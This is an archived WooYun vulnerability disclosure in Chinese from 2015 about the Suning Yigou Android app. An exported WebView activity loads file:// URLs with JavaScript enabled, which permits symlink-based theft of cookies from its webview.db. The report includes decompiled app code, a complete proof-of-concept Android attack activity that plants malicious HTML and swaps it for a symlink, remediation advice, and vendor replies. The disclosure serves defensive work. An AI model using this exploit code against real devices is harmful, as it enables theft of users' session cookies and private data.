乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-16: 细节已通知厂商并且等待厂商处理中 2015-04-19: 厂商已经确认,细节仅向厂商公开 2015-04-22: 细节向第三方安全合作伙伴开放 2015-06-13: 细节向核心白帽子及相关领域专家公开 2015-06-23: 细节向普通白帽子公开 2015-07-03: 细节向实习白帽子公开 2015-07-18: 细节向公众公开
苏宁易购Android客户端版逻辑缺陷导致隐私泄漏
苏宁易购Android版对file域下符号链接限制不当,可导致cookie等用户隐私被窃取
接收参数:
private void b() { Intent v0 = this.getIntent(); this.g = v0.getStringExtra("activityName"); this.a = v0.getStringExtra("background"); this.c = v0.getStringExtra("param"); this.h = v0.getBooleanExtra("isShowTitle", true); this.i = v0.getBooleanExtra("isPost", false); this.j = v0.getBooleanExtra("isNeedClearTop", true); this.k = v0.getStringExtra("webview_source"); }
未对file域进行处理:
protected void a(boolean arg7, String arg8, String arg9) { if(arg8.contains("manzuo")) { c v0 = c.a(); StringBuilder v1 = new StringBuilder(); v1.append(v0.c).append("trustLogin?sysCode=").append("manzuowap").append("&targetUrl="). append(URLEncoder.encode(arg8)).append("&mode=restrict"); arg8 = v1.toString(); } if(arg8.contains("snbook")) { String v0_1 = c.a().ab; String v1_1 = c.a().ad; CookieSyncManager v2 = CookieSyncManager.createInstance(((Context)this)); CookieManager v3 = CookieManager.getInstance(); v3.setAcceptCookie(true); v3.setCookie(v0_1, "code=snebuy_android;domain=" + v1_1); v3.setCookie(v0_1, "version=" + e.a(((Context)this)) + ";" + "domain=" + v1_1); v2.sync(); } if((arg8.contains("isSNMobileLogin")) && !this.isLogin()) { this.t.sendEmptyMessage(269); } else if(arg7) { this.d.postUrl(arg8, EncodingUtils.getBytes(arg9, "utf-8")); } else { this.d.loadUrl(arg8); } }
导致cookie等用户隐私被窃取
import android.net.Uri;import android.os.Bundle;import android.app.Activity;import android.content.Intent;public class MainActivity extends Activity { public final static String MY_PKG = "com.example.testsuning"; public final static String MY_TMP_DIR = "/data/data/" + MY_PKG + "/tmp/"; public final static String HTML_PATH = MY_TMP_DIR + "A" + Math.random() + ".//.html"; public final static String TARGET_PKG = "com.suning.mobile.ebuy"; public final static String TARGET_FILE_PATH = "/data/data/" + TARGET_PKG + "/databases/webview.db"; public final static String HTML = "<body>" + "<u>Wait a few seconds.</u>" + "<script>" + "var d = document;" + "function doitjs() {" + " var xhr = new XMLHttpRequest;" + " xhr.onload = function() {" + " var txt = xhr.responseText;" + " d.body.appendChild(d.createTextNode(txt));" + " alert(txt);" + " };" + " xhr.open('GET', d.URL);" + " xhr.send(null);" + "}" + "setTimeout(doitjs, 8000);" + "</script>" + "</body>"; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); doit(); } public void doit() { String HTML_PATH = MY_TMP_DIR + "A" + Math.random() + ".html"; try { // Create a malicious HTML cmdexec("mkdir " + MY_TMP_DIR); cmdexec("echo \"" + HTML + "\" > " + HTML_PATH); cmdexec("chmod -R 777 " + MY_TMP_DIR); Thread.sleep(1000); // Force Chrome to load the malicious HTML invokeChrome("file://" + HTML_PATH); Thread.sleep(40000); // Replace the HTML with a symlink to Chrome's Cookie file cmdexec("rm " + HTML_PATH); cmdexec("ln -s " + TARGET_FILE_PATH + " " + HTML_PATH); } catch (Exception e) {} } public void invokeChrome(String url) { Intent intent = new Intent(Intent.ACTION_VIEW); intent.putExtra("background", url); intent.putExtra("activityName", "test"); intent.putExtra("param", "test"); intent.putExtra("webview_source", url); intent.setClassName(TARGET_PKG, "com.suning.mobile.ebuy.host.webview.SuningWebViewActivity"); startActivity(intent); } public void cmdexec(String cmd) { try { String[] tmp = new String[] {"/system/bin/sh", "-c", cmd}; Runtime.getRuntime().exec(tmp); } catch (Exception e) {} }}
不要将不必要组件导出;如需导出,禁止使用File协议;如需使用File协议,禁止js执行:setJavaScriptEnabled(False)
危害等级:高
漏洞Rank:10
确认时间:2015-04-19 16:13
感谢提交,移动客户端问题较多,一并处理,谢谢。
2015-05-27:稍后送上苏宁易购200元礼品卡。
2015-06-08:请路人甲站内留下联系方式,以便发放礼品卡,谢谢。